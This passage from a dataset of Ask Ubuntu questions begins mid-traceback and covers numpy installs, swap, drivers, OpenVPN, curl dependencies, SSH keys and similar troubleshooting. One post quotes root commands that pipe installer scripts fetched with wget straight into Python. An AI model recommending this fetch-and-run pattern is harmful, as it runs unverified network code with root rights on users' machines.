) : file `` < stdin > '' , line 1 , in < module > file `` /usr/lib/python2.7/dist-packages/scipy/__init__.py '' , line 78 , in < module > from numpy import show_config as show_numpy_config file `` /usr/lib/python2.7/dist-packages/numpy/__init__.py '' , line 137 , in < module > import add_newdocs file `` /usr/lib/python2.7/dist-packages/numpy/add_newdocs.py '' , line 9 , in < module > from numpy.lib import add_newdoc file `` /usr/lib/python2.7/dist-packages/numpy/lib/__init__.py '' , line 4 , in < module > from type_check import * file `` /usr/lib/python2.7/dist-packages/numpy/lib/type_check.py '' , line 8 , in < module > import numpy.core.numeric as _nx file `` /usr/lib/python2.7/dist-packages/numpy/core/__init__.py '' , line 5 , in < module > import multiarray importerror : /usr/lib/python2.7/dist-packages/numpy/core/multiarray.so : undefined symbol : pyunicodeucs4_asunicodeescapestring in order to get rid of the error i had tried : satisfy python requirement : $ sudo apt-get install build-essential python-dev gfortran install with apt-get : $ sudo apt-get install python-numpy python-scipy python-matplotlib ipython ipython-notebook python-pandas python-sympy python-nose install requirement with pip : $ sudo pip install requests ... and tried to installing with pip : $ sudo pip install numpy and $ sudo pip install scipy i already have the environment var : export pythonpath=/usr/lib/python2.7/dist-packages : $ { pythonpath } the last time i installed numpy and scipy ( in older ubuntu version 10.x ) this worked for me . sudo sh -c `` wget http : //python-distribute.org/distribute_setup.py -o- | python '' sudo sh -c `` wget https : //raw.github.com/pypa/pip/master/contrib/get-pip.py -o- | python '' and then install both of them with pip as in ( 4 ) but now it seems that the server of python-distribute.org is down . i got the following error : http : //python-distribute.org/distribute_setup.py resolving python-distribute.org ( python-distribute.org ) ... failed : name or service not known . wget : unable to resolve host address `python-distribute.org' i had also tried to install numpy and scipy from synaptic and ubuntu software center i had failed in each of this attempts and now i do n't know what to do . am i missing something ? how can i get numpy and scipy correctly installed for python ? any idea will be appreciated . when i do echo $ pythonpath i get /usr/lib/python2.7/dist-packages
359256	will mir support workspaces ?	although the workspace switcher no longer appears by default in raring/saucy , it can still be enabled , and some users find it invaluable . will 14.04 or whichever version adopts mir provide equivalent functionality ?
359258	swap not available on system monitor	i had a swap partition of 1gb ( ram 1gb , ubuntu 12.04 lts ) . now swap is not shown on system monitor neither can i hibernate my pc ( sudo pm-hibernate ) . blkid output : /dev/sda1 : uuid= '' b8b4fbb1b4fb706c '' type= '' ntfs '' /dev/sda2 : uuid= '' 2ea7d608-2d89-4e41-9436-d05cb3ce8871 '' type= '' swap '' /dev/sda3 : uuid= '' 3219d03a-67e4-454b-8ce7-a27831846e35 '' type= '' ext4 '' /dev/sda5 : label= '' softwares '' uuid= '' ac1cc3301cc2f47c '' type= '' ntfs '' /dev/sda6 : label= '' education '' uuid= '' 1e103e6c103e4b53 '' type= '' ntfs '' /dev/sda7 : label= '' recreation '' uuid= '' 2cc8d181c8d149aa '' type= '' ntfs '' /dev/sda8 : label= '' miscellaneous '' uuid= '' 0274d6b174d6a727 '' type= '' ntfs '' /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda6 during installation uuid=3219d03a-67e4-454b-8ce7-a27831846e35 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=2ea7d608-2d89-4e41-9436-d05cb3ce8871 none swap sw 0 0 free -m total used free shared buffers cached mem : 991 867 123 0 27 418 -/+ buffers/cache : 421 569 swap : 0 0 0 cat /proc/swaps filename type size used priority fdisk -l disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x9f369f36 device boot start end blocks id system /dev/sda1 * 63 31471334 15735636 7 hpfs/ntfs/exfat /dev/sda2 31471616 33470447 999416 82 linux swap / solaris /dev/sda3 33472512 62539775 14533632 83 linux /dev/sda4 62541045 312592769 125025862+ f w95 ext 'd ( lba ) /dev/sda5 62541108 125066024 31262458+ 7 hpfs/ntfs/exfat /dev/sda6 125066088 187591004 31262458+ 7 hpfs/ntfs/exfat /dev/sda7 187591068 250115984 31262458+ 7 hpfs/ntfs/exfat /dev/sda8 250116048 312576704 31230328+ 7 hpfs/ntfs/exfat swapon -- all swapon : /dev/sda2 : swapon failed : invalid argument dmesg | grep -a 5 -b 5 -i swap [ 9.487404 ] ext4-fs ( sda3 ) : ext4_orphan_cleanup : deleting unreferenced inode 131645 [ 9.487413 ] ext4-fs ( sda3 ) : ext4_orphan_cleanup : deleting unreferenced inode 131330 [ 9.487418 ] ext4-fs ( sda3 ) : 16 orphan inodes deleted [ 9.487420 ] ext4-fs ( sda3 ) : recovery complete [ 9.578600 ] ext4-fs ( sda3 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 20.580539 ] swap area shorter than signature indicates [ 20.588363 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 20.619443 ] udevd [ 330 ] : starting version 175 [ 20.649959 ] lp : driver loaded but no devices found [ 20.662972 ] [ drm ] initialized drm 1.1.0 20060810 [ 20.675515 ] i915 0000:00:02.0 : setting latency timer to 64 -- [ 72.288573 ] pm : thaw of drv : sr dev:3:0:0:0 complete after 178.143 msecs [ 72.288578 ] pm : thaw of drv : scsi_device dev:3:0:0:0 complete after 178.136 msecs [ 72.299677 ] pm : thaw of drv : scsi_device dev:2:0:0:0 complete after 189.270 msecs [ 72.309473 ] pm : thaw of devices complete after 202.763 msecs [ 72.309668 ] pm : writing image . [ 72.309670 ] pm : can not find swap device , try swapon -a . [ 72.309699 ] pm : can not get swap writer [ 72.329896 ] restarting tasks ... done . [ 72.331777 ] pm : basic memory bitmaps freed [ 72.331792 ] video lnxvideo:00 : restoring backlight state [ 72.420048 ] option1 ttyusb0 : option_instat_callback : error -84 [ 72.804047 ] option1 ttyusb0 : option_instat_callback : error -84 -- [ 145.960625 ] sd 7:0:0:0 : attached scsi generic sg2 type 0 [ 145.972036 ] sd 7:0:0:0 : [ sdb ] attached scsi removable disk [ 172.430508 ] ppp bsd compression module registered [ 172.455583 ] ppp deflate compression module registered [ 332.260789 ] type=1400 audit ( 1381814763.342:27 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=636 comm= '' cupsd '' pid=636 comm= '' cupsd '' capability=36 capname= '' block_suspend '' [ 1913.030998 ] swap area shorter than signature indicates [ 2022.530155 ] type=1400 audit ( 1381816453.610:28 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=636 comm= '' cupsd '' pid=636 comm= '' cupsd '' capability=36 capname= '' block_suspend '' [ 4062.729509 ] swap area shorter than signature indicates please help . thanks in advance . df -h filesystem size used avail use % mounted on /dev/sda3 14g 6.1g 7.0g 47 % / udev 488m 4.0k 488m 1 % /dev tmpfs 199m 868k 198m 1 % /run none 5.0m 4.0k 5.0m 1 % /run/lock none 496m 224k 496m 1 % /run/shm
359260	ubuntu 13.04 unusual sound problems , asus pc-dl , dual xeon processor board	i have n't found any answers to this yet , i have a weird sound problem , i think it 's a software problem but i 'm not 100 % sure . i 'm using an asus pc-dl board with dual xeon processors , i 've used it since the first ubuntu release in 2004 and the sound has worked like a charm until i installed 13.04 . there is absolutely no sound ( and yes i know for a fact that i 've pluged in to the right jack , and alsamixer is not muted ) . i 've reinstalled pulseaudio- no difference , i 've tried alsa without pulseaudio- still nothing , i booted from a live cd of ubuntu 10.04- no sound , then i took my spare identical motherboard , installed it , and i get no difference ( which led me to believe that it 's not a hardware issue after all . oh and i forgot to mention that pulseaudio does recognize the built in sound cards , and i 've tried all- no sound . and if i plug a mic in , i know that the computer is getting input because of the input levels in the sound settings . if anybody could help me , or lead me to a thread that answers this i would appreciate it ~ thanks
359262	difficulties with bcm4313 driver in ubuntu studio 13.04	i have recently installed ubuntu studio 13.04 on my netbook . it is excellent , but i have some problems with my wifi . if i use the command lspci i can see that i have a broadcom bcm4313 wireless card installed . if i run the command iwconfig there is no wlan0 ! it seems that ubuntu does not pick up the wifi card or the card is blacklisted .
359264	how to open udf volume	i have a dvd which i can open in windows , but in my ubuntu 12.04 installation i can not any more . i receive this error : unable to mount udf volume error mounting : mount : block device /dev/sr0 is write-protected , mounting read-only mount : wrong fs type , bad option , bad superblock on /dev/sr0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so what should i do to open it ? do i need to install anything ?
359265	netbook/tablet : is there a way to switch between desktop mode and touch mode ( preferably the new touch interface of ubuntu ) ?	i have a dell inspiron duo ( a netbook with flipping screen that functions as a tablet as well ) ... and to revive this netbook/tablet i installed ubuntu ( 13.10 ) . everything seems to work just fine ( in desktop mode ) but i would like to switch to the touch-interface once the screen gets flipped . i read an article on the dell inspiron duo that does this ( http : //ubuntuforums.org/showthread.php ? t=1658635 ) but ... i like the new touch-interface for ubuntu unity so much ... i would like to use that ... is there a way to install it and have it behave as i described above ? ( please use descriptive explanations as i am almost a newbie on linux ) thanks all .
359267	can not find curl-config in ubuntu 13.04	i am installing package rcurl in r and getting an error checking for curl-config ... no can not find curl-config error : configuration failed for package ârcurlâ i have tried to install libcurl on ubuntu , but it does n't solve my problem have some dependecies sudo apt-get install libcurl4-gnutls-dev some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libcurl4-gnutls-dev : depends : libcurl3-gnutls ( = 7.29.0-1ubuntu3.1 ) but 7.29.0-1ubuntu3.2 is to be installed depends : libldap2-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . locate curl config gives me nothing : locate curl-config curl-config the program 'curl-config ' can be found in the following packages : * libcurl4-gnutls-dev * libcurl4-nss-dev * libcurl4-openssl-dev i went through some of the solution rcurl but it is working . can you suggest or help in this direction . thank you so much . edit when i tried to install ( curl ) from ubuntu software center got the same erroe message package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : curl : depends : libcurl3 ( = 7.29.0-1ubuntu3.1 ) but 7.29.0-1ubuntu3.2 is to be installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.7.dfsg-13ubuntu2 is to be installed edited sudo aptitude install libcurl4-openssl-dev the following new packages will be installed : libcurl4-openssl-dev { b } 0 packages upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 1,210 kb of archives . after unpacking 2,778 kb will be used . the following packages have unmet dependencies : libcurl4-openssl-dev : depends : libcurl3 ( = 7.29.0-1ubuntu3.1 ) but 7.29.0-1ubuntu3.2 is installed . depends : libidn11-dev but it is not going to be installed . depends : libkrb5-dev but it is not going to be installed . depends : libldap2-dev but it is not going to be installed . depends : librtmp-dev but it is not going to be installed . depends : libssl-dev but it is not going to be installed . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) libcurl4-openssl-dev [ not installed ]
359276	master pdf editor installation problems in ubuntu 12.04.3	i had master pdf editor installed on 12.02 and it worked well . now i upgraded to 12.04.3 and installed master pdf editor and it refuses to get installed/it gets installed but it does not open/it opens but it does not do what is supposed to do the commands i used were $ wget -c code-industry.net/public/masterpdfeditor-1.9.00.i386.tar.gz $ tar -xzvf masterpdfeditor-1.9.00.i386.tar.gz $ cd masterpdfeditor $ sudo chmod +x pdfeditor $ ./pdfeditor any idea to fix this problem
359277	unable to set keyboard shortcut for gnome-screenshot -a	i 'm using ubuntu12.04 with xfce-desktop . i can apply a keyboard shortcut successfully for gnome-screenshot gnome-screenshot -w through settings manager- > keyboard- > shortcut . the weird thing is that it did n't trigger any event when i change the command to gnome-screenshot -a , but i can still run gnome-screenshot -a from terminal . btw , xfce4-screenshot -r works but the background will get dark , so i prefer to use gnome-screenshot -a . does anyone have any idea about this problem ? thanks !
359278	ca n't suspend computer while plugged in	i 'm running ubuntu 13.04 alongside windows 8 on an acer aspire e1-571g . when my laptop is plugged in and charging and i suspend it when i try to wake it up it freezes and the screen stays black . this do n't happen when i put my laptop to suspend and wake it up without it being plugged in and charging . is there anything i can do to fix this ?
359282	i ca n't set xubuntu 13.04 to connect to the nearest access point	at my house there are 3 wireless connections and they are all joined together to make one . i want to connect to my nearest one , but it connects to another one . this happens often , but after a day its gone and then the next day it comes back again . does anyone have solution ?
359284	how to know some app 's console command in unity dash ?	is it possible to see some app 's console command from unity dash menu ? for example , i open the dash via the windows key , type in some app name , it appears in the list below , and i do `` something '' to see how to start it from the command line . i am asking this because i came across multiple 3rd party apps whose console command has nothing with the app name , and i was unable to figure out how to open such apps from the console .
359285	does btrfs support per user quota ?	if i move the /home/ ... folders to a btrfs partition , can i still enable per user quota ? that is , each user should be able to use a limited amount of storage .
359286	desktop.exe in ubuntu	i have installed ubuntu on my laptop and desktop . but i need to access another window installed pc/server using remotedesktop.exe . how can i open remote desktop . exe in ubuntu for accessing another window installed pc/server ? please help me ...
359287	wo n't ubuntu touch run on a allwinner tablet ?	i have a allwinner android tablet and i want to install ubuntu touch . will it be able to run on my tablet ? my tablet specifications cpu : 1 core cortex a8 ram : 353 mb allwinner a3 chipset 4gb rom sorry for my bad english : (
359291	dual boot system : windows 8 starts up with black screen if started from grub	i do n't even know if this problem has anything to do with grub or ubuntu . it could be just a hardware problem . my problem started after i installed my new graphics card ( radeon hd7970 ) . everything worked flawlessly with my old nvidia gtx470 card . i have a dual boot system ( ubuntu and windows 8 ) . if i start windows from the grub boot loader it switches to a blank screen after a few seconds . i think that the system is still booting up because i hear the hard drives and the keyboard also flashes shortly . the screen also does n't show `` no signal '' . it 's just blank . the same thing happens with ubuntu . but not everytime . sometimes it boots just fine . so i basically have to reset my computer again and again until it works . my processor is an intel 3770k with integrated gpu . i think that maybe the computer uses the wrong graphics output when booting from grub . maybe it switches to the igpu . i ca n't disable the igpu . there is no option in the bios . my board is an ( asrock z77 pro3 ) if i reinstall the windows boot loader , windows boots fine and without problems . i only get this problem when launching any of the systems from grub .
359293	vagrant boxes as openstack images	i have a node with openstack installed on it . currently i have one ubuntu image file . . can i use www.vagrantbox.es .box files for openstack ? i 'm starting a cloud hosting company .
359299	dns issues on ubuntu 12.04 with openvpn	i followed this guide to setup openvpn on my home network . i accidentally downloaded ubuntu 12.10 at first and without noticing , i went ahead and followed the guide ... then i did some stuff from here : push `` redirect-gateway def1 '' iptables -t nat -a postrouting -s 10.8.0.0/24 -o eth0 -j masquerade to enable browsing . openvpn was fully function . by that i mean , i was able to remote in ( access internal services ) and mask my ip when browsing from the outside . then i realized that i wanted ubuntu 12.04 so i followed the same process on a new install . now the problem is that the dns does not resolve . i noticed that downloading openvpn downloaded resolvconf which i uninstalled and attempted to go about this manually . here is some stuff from my system : openvpn server.conf : mode server tls-server local 192.168.1.101 # # ip/hostname of server port 80 # # default openvpn port proto udp # bridging directive dev tap0 # # if you need multiple tap devices , add them here up `` /etc/openvpn/up.sh br0 tap0 1500 '' down `` /etc/openvpn/down.sh br0 tap0 '' persist-key persist-tun # certificates and encryption ca ca.crt cert server.crt key server.key # this file should be kept secret dh dh1024.pem tls-auth ta.key 0 # this file is secret cipher bf-cbc # blowfish ( default ) comp-lzo # dhcp information ifconfig-pool-persist ipp.txt server-bridge 192.168.1.10 255.255.255.0 192.168.1.100 192.168.1.110 push `` redirect-gateway def1 '' push `` dhcp-option dns 8.8.8.8 '' push `` dhcp-option dns 8.8.4.4 '' # push `` dhcp-option domain yourdomain.com '' # push `` redirect-gateway local def1 '' # push `` dhcp-option dns 8.8.8.8 '' # push `` redirect-gateway def1 bypass-dhcp '' # push `` dhcp-option dns 192.168.1.1 '' # push `` dhcp-option dns 8.8.8.8 '' max-clients 10 # # set this to the max number of clients that should be connected at a time # log and security user nobody group nogroup keepalive 10 120 status openvpn-status.log verb 3 /etc/network/interfaces : root @ ironman : ~ # cat /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface # auto lo # iface lo inet loopback # the primary network interface # auto eth0 # iface eth0 inet dhcp # # # # # # # # # # # # # open vpn setup # # # # # # # # # # # # # # # # # this is the network bridge declaration # # start these interfaces on boot auto lo br0 iface lo inet loopback iface br0 inet static address 192.168.1.101 netmask 255.255.255.0 gateway 192.168.1.1 bridge_ports eth0 nameserver 8.8.8.8 iface eth0 inet manual up ip link set $ iface up promisc on down ip link set $ iface down promisc off nameserver 8.8.8.8 root @ ironman : ~ # cat /etc/resolv.conf nameserver 8.8.8.8 nameserver 192.168.1.1 root @ ironman : ~ # ping google.com ping google.com ( 74.125.239.100 ) 56 ( 84 ) bytes of data . 64 bytes from nuq05s01-in-f4.1e100.net ( 74.125.239.100 ) : icmp_req=1 ttl=55 time=22.6 ms 64 bytes from nuq05s01-in-f4.1e100.net ( 74.125.239.100 ) : icmp_req=2 ttl=55 time=21.7 ms 64 bytes from nuq05s01-in-f4.1e100.net ( 74.125.239.100 ) : icmp_req=3 ttl=55 time=22.8 ms any help would be appreciated
359300	gparted ubuntu live partition won 't resize	i 've booted a ubuntu livecd and this is what i get : i have tried to resize the existing partition from its current size to a larger one , on an esx virtual machine . but i get the red exclamation mark and the partition does not resize , what am i doing wrong ? i 've followed the steps in other posts but i am not able to resize it .
359301	how to login desktop without being interrupted by ctrl+c ?	i made a ubuntu system from ubuntu server by adding xong and openbox on it . i also edited .profile to auto login x , so i can power on and wait a few seconds , then it 's in the openbox desktop . but if i continuously press ctrl+c durning bootup , it will stop at the console . i tried to disable ctrl+c but it does n't work during bootup . anyone knows about it ? thanks in advance . regards blangero
359302	vmtools and gui	i 'm running an ubuntu vm on windows via vmplayer . i 'm not a system administrator of the machine and therefore i ca n't install tools , and easyinstall does not correclty finish the installation , in particular , when i switch on the vm the gui does not show . is there a way to install ubuntu by myself and not guided by easyinstall or tools ? the gui correctly appears during installation , interface and so forth , but when it finishes , i can only go terminal . any help will be appreciated . thanks for your time .
359304	'j ' key is not working in terminal	my j key is not working in my ubuntu 12.04 terminal . it 's working in capital form and also in vim . is there any way i can fix it ? how can i install a alternative terminal ?
359308	problems installing ubuntu - any version	i 'm new to linux so i may ask some simple or stupid questions . i want to set up a file & web server . can this be done on the same machine or do i need to have separate machines ? i have downloaded both the desktop iso & server iso versions but can not get either one to install correctly . i have created a bootable cd of the server version . during installation i am asked to select country / keyboard & language , then get an error that the cd can not be mounted . why is it trying to mount the cd ? and does this mean i need to have a cd burner in my machine ? the machine has clean / wiped & formatted hdd so no conflicts with any other op sys or software . starting to pull my hair out as i have been trying to install for a week now . when trying to create a bootable cd of the desktop version it failed as it is 707mb and a cd is only 700mb . my system is 32x dual p3 processors and 512mb ram 160gb hdd . this is my test system prior to reconfiguring an existing windows machine . suggestions / advice please . thanks .
359309	sony ericsson xperia x2	can not see that someone tried to install ubuntu on xperia x2 . no one have this brick useless with windows phone ? from time to time i remember about forgotten phone , a search for alternative os . maybe ubuntu is a solution ?
359310	force chromium and firefox to use tls 1.2	how can you force chromium and firefox to use tls 1.2 instead of the previously less secure versions ? using ubuntu 13.04
359314	how to remove weird screen glitch 'double desktop '	i 've installed 13.04 on my pc , but my desktop shows this weird phenomenon . i have a double task bar ( sound/clock/settings buttons ) and that there is a smaller wallpaper in the top left corner of my desktop ; as shown : how do i fix this ? thank you very much in advance ! edit : some additional information clean ubuntu 13.04 install on i5-2400 / hd6790 / z68p motherboard / 4gb ram i have no additional drivers installed ... im going to try out installing drivers from amd 's official site , and ill let you guys know what happens .
359321	asus xonar phoebus solo under ubuntu 13.04	i have a strange problem with asus xonar phoebus solo . this sound card is basically recognized as a sound device ( see the extract below ) , but still , it is not listed , so i can not choose it for playback . i have created some extracts/reports and i think it is an alsa-related problem ! the card is based on the oxygenexpress cm8888dht sound processor/pci express and i 'd like to hook it up onto my home theater receiver thru spdif . system extracts : dmesg : http : //pastebin.com/bpzyx6mg lshw -c sound : http : //pastebin.com/g4r1tgc0 many thanks in advance for your help !
359322	least impact upgrade to latest ubuntu from old version	i am looking to upgrade from 13.04 to the upcoming 13.10 but have a few questions about how to handle the upgrade whilst having the least impact on my current setup . i have these partitions on my brand new ssd : /boot - 512 mb / - 30 gb / - 30 gb ( for alternate install , i like to try different distros on my laptop ) /usr/local/bin - 20 gb ( contains all my dev env binaries like java6 , java7 , ant , sbt , eclipse , sublime text etc. , manually installed by me ) /home - 65gb swap - 8 gb ( same as ram ) data - remaining 70 gb i have windows that came with the laptop installed on my slower 7200rpm spindle disk and am using its remainder 400gb as my primary data storage . i am looking at the easiest way to upgrade with a clean install to the latest version of ubuntu while keeping the following intact : ( done ) home folder ( including ssh keys , wine , all user configurations , etc . ) user defined env variables used for development ( pointing to /usr/local/bin in ~/.zshrc for making commands like java , scala , ant etc available on cli ) programs installed like f.lux , shutter , guake , clipit , terminator , git etc . startup applications like skype , bitmessage , dropbox etc . ( done ) custom ppa packages added installed and configured app indicators should i change my partition strategy ? im not aware if there is a better way of partitioning the disk to install all the operating systems according to my requirements . what should my backup policy be ? should i create another partition on my spindle disk to save local backups ? how big should it be ? what folders should i backup ? to partially fill in the blanks for q1 . : i found this link which helps in recovering the ppa list and installed packages . there is also another link with a similar motive . so my problem of ppa , installed packages , home directory is resolved . but im concerned about my /usr/local/bin , my startup applications and my installed app indicators . if my dev environment remains unaltered im happy .
359323	software sources not showing in dash	i want to install spotify and therefor i need to find something called `` software sources '' . it should be found in dash . but i can only find software center . in software center i can find `` software sources '' and it says installed . i tried to uninstall it and reinstall it . i ca n't open it from the software center . and dash does n't find it . how can i find it ? totally new at this .
359335	no internet in vm	i 'm behind my company proxy ( or more specifically , net configuration stored in a web ) and my vm can not connect to internet . host is windows 7 enterprise guest is ubuntu 12.04 lts in vmplayer . i ca n't install tools because i 'm not an administrator of the system . how may i connect to the internet ? the laptop host is wired coonnected . thanks for your time .
359337	how to increase screen resolution in hyper-v	i am using ubuntu 12.04 on hyper-v in windows 8 . i want to increase the resolution so that ubuntu window can occupy my whole screen . does anyone have any idea of how it can be done ? i found one solution http : //nramkumar.org/tech/blog/2013/05/04/ubuntu-under-hyper-v-how-to-overcome-screen-resolution-issue/ , i have installed openssh server on ubuntu and xming and putty on windows . i am not sure what hostname to use to connect to ubuntu ( running in hyper-v ) , using username @ 127.0.0.1 or username @ localhost in the hostname field returns error `` network error : connection refused '' . can someone help me figure out what i am doing wrong ?
359344	any new way to install w32codecs / w64codecs through apt-get ?	i 'm making a customized ubuntu system . we used to add medibuntu repository in order to let users install w32codecs / w64codecs . however medibuntu is closed now . ( http : //medibuntu.org ) . would anyone please tell me where i can find a new way to install them through apt-get ?
359345	`` kernel panic - not syncing : no init found . try passing init=option to kernel '' 12.04 first boot	so i installed ubuntu 12.04.3 lts 64bit as the only operating system after my laptop hard drive was erased . it boots from usb happily enough and the laptop used to dual boot windows 7 and ubuntu 12.04 before said hard drive issues . it installs ubuntu happily enough and then gives me the option to reboot . at this point it attempts to boot from hard drive and that brings up the error kernel panic - not syncing : no init found . try passing init=option to kernel . this same error occurs in the recovery mode too so the only way i can currently boot this laptop is from usb . i have run a boot-repair and got http : //paste.ubuntu.com/6239985/ i 'm relatively new to ubuntu so please excuse silly questions . would one solution be to try using the 32bit version or maybe even 13.04 ?
359346	create a 13.04 distro/remix ( installable ) based on current system installation	i want to create a distro based on my current ubuntu installation basically i added custom plymouth animation , some packages like oracle java 7 and some tweaks and themes with ubuntu and gnome tweaks . also , i added preload and prelink ( idk if can cause problems ) and installed gnome-shell instead of unity ... also i want some apps to start up at user login ... i tried and tried , using remastersys ( suggested here ) and using apps like uck or ubuntu builder . they both do n't permit to copy the current system and also , both ca n't run a chrooted terminal ( i really do n't know why , tried also following the wizard ) . i run a copy of ubuntu 13.04 .
359348	i accidentally deleted all admin accounts [ 13.04 ]	i accidentally deleted all admin accounts , i can only use guest account and i do n't know my root password . how can i recover my admin account ?
359349	ubuntu 13.04 ca n't open software & updates / software sources	i am using macbook air mid 2012 running single os which is ubuntu ( raring ringtail ) . its been a month i 'm using ubuntu and everything works fine , recently i ca n't open software & updates , when i click it does not shows up/open . when i open ubuntu software center- > edit- > software sources , again it does not open . but when i open terminal , type sudo software-properties-gtk it shows up/open . am i in trouble ? does something goes wrong ? note : installing software from ubuntu software center , installing from terminal , opening software updater works fine . really love ubuntu ! output from terminal when i type : sudo dpkg-reconfigure software-center : updating software catalog ... this may take a moment . info : softwarecenter.db.pkginfo_impl.aptcache : aptcache.open ( ) warning : softwarecenter.db.update : the file : '/usr/share/app-install/desktop/sonic-visualiser : x-sonicvisualiser.desktop ' could not be read correctly . the application associated with this file will not be included in the software catalog . please consider raising a bug report for this issue with the maintainer of that application warning : softwarecenter.db.update : the file : '/usr/share/app-install/desktop/workrave : workrave.desktop ' could not be read correctly . the application associated with this file will not be included in the software catalog . please consider raising a bug report for this issue with the maintainer of that application warning : softwarecenter.db.update : the file : '/usr/share/app-install/desktop/sonic-visualiser : x-sonicvisualiser-layer.desktop ' could not be read correctly . the application associated with this file will not be included in the software catalog . please consider raising a bug report for this issue with the maintainer of that application software catalog update was successful .
359350	how to remove right click format option to a disk icon in the launcher ?	how to remove right click `` format '' option from a disk icon in the launcher as it can lead to formatting by mistake .
359352	asking for authentication informationon ubuntu 12.04 with xampp	i 'm using ubuntu 12.04 with xampp . in ubuntu i 'm using xampp as localhost . i 'm using wordpress , but when i 'm installing a new theme or plugin it is asking me for authentication information like ftp-hostname and ftp-username and ftp-password and ftp or ftp ( ssl ) . i entered localhost as ftp-hostname , but what do i need to enter in as ftp-username and ftp-password , because without this authentication information i ca n't install a new theme or plugin in wordpress .
359357	toram option and persistence on live usb	i created an ubuntu live usb using unetbootin . i also know that the to ram option would speed up the os in exchange of ram . but when i do append persistence with the toram to the boot options , it does n't save my changes , but it does boot to ram because the free reports about 800+ mb usage -- just enough for the iso . why does n't it work ?
359358	ca n't connect to with tp-link usb wifi	my notebook 's internal wifi adapter stopped working ( maybe because of overheating ? ) . i bought a usb wifi ( tp-link 150mbs wireless n usb adapter tl-wn723n ) . now internet is fine in windows 7 . but not in ubuntu i think it 's still trying to use the internal adapter . ( atheros ) can i disable the internal adapter and get ubuntu to use the usb wifi ? it 's a bit of a pain to fix 'cos i have to reboot between windows with internet and ubuntu with no internet ...
359360	one page wo n't load	i have ubuntu 13.04 and i have a problem loading just one page , every other work normally . the page is `` moodle.pmfst.hr '' , i tried to open it in google chrome , firefox and opera but none would load it . page is working fine , because i asked my sister to try to load it and she said she have no problems with it . i reinstalled java , installed nginx , mysql , php . reset browser settings , enabel/disable cookies , enable/disable `` predict network actions to improve page load performance '' but no help from that . any ideas ? thanks .
359362	how to correctly install apache2 , php5 , mysql and phpmyadmin	what is the most correct method of installing apache 2 server , php5 , mysql and phpmyadmin ? i installed it this week , and i had a lot problems without solutions , so now that i reinstalled ubuntu 13.04 i do n't want to make the same mistake again .
359363	c , fork ( ) process management	how to make grandchild1 internal function , and grandchild2 call external terminal command main ( ) { if ( fork ( ) ==0 ) //child { if ( fork ( ) ==0 ) //grandchild1 { } if ( fork ( ) ==0 ) //grandchild2 { } } } thanks much in advance ! ! !
359369	how can i search manpages in 13.10âs dash ?	in 13.10 , there is no dedicated help lens . in 13.04 , it was the place for docs like yelp , manpages or texinfo . however , there is a manpage scope in the dash , and it is activated . but when i search for , e.g. , `` pdftotext '' , there is no result in the dash . is there a way to access manpages , or other help files , through the dash in 13.10 ?
359374	cant create wp-content/upgrade in wordpress	could not create directory . /opt/lampp/htdocs/wordpress/wp-content/upgrade error display if i install new theme in wordpress . i am using ubantu 12.04 and xampp as a localhost . what i do now ? and how do i check the permission ?
359377	how to resize boot partition	here 's my problem . i 'd like to reinstall ubuntu . my laptop is an old hp compaq nx7400 . the optical drive went wrong , it ca n't read discs . i would use a usb port instead but the laptop wo n't boot from it . ( it wo n't boot even if i set usb the first in the boot order in bios settings . also on start up after pressing f9 to choose boot device usb wo n't appear in the list , only optical disk , netbook disk and network if i enable it . ) i wanted to resize the boot partiton to make space for the installation but i could n't do that because it seems that the whole hdd is the boot partiton so it ca n't be unmounted using gparted . my partition system is the following : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000e6661 device boot start end blocks id system /dev/sda1 * 2048 486318079 243158016 83 linux /dev/sda2 486320126 488396799 1038337 5 extended /dev/sda5 486320128 488396799 1038336 82 linux swap / solaris so how can i make a new partition to be able to install a `` new '' ubuntu and get rid of the old one . or any better solution for this problem ? i hope it 's not a catch 22 ...
359380	setup ssh encryption keys	here is the situation : i have 4 linux servers . /home is same for all the four servers . ( it 's a network drive ) . i want to setup a password-less ssh via setting up encryption keys . i created rsa key pair using ssh-keygen . because the /home is same for all users . so i added the public key to authorized key for $ home/.ssh directory but when i try to ssh to these servers , it still asks for the password . help please !
359383	youtube stuttering ( video/audio ) in chromium after installing kde	chromium version 28.0.1500.71 ubuntu 13.04 ( 28.0.1500.71-0ubuntu1.13.04.1 ) adobe flash player - version : 11.2 r202 shockwave flash 11.2 r202 name : shockwave flash version : 11.2 r202 location : /usr/lib/flashplugin-installer/libflashplayer.so type : npapi the default kde browser works fine . however the chromium playback was fine in gnome-shell .
359386	why do i get `` hash sum mismatch '' error while trying to upgrade ?	when i start to upgrade 12.04 , it gives me the following error and does n't allow me to upgrade to 12.10 : w : failed to fetch gzip : /var/lib/apt/lists/partial/mirrors.kernel.org_ubuntu_dists_lucid_universe_source_sources hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . how do i resolve this issue ?
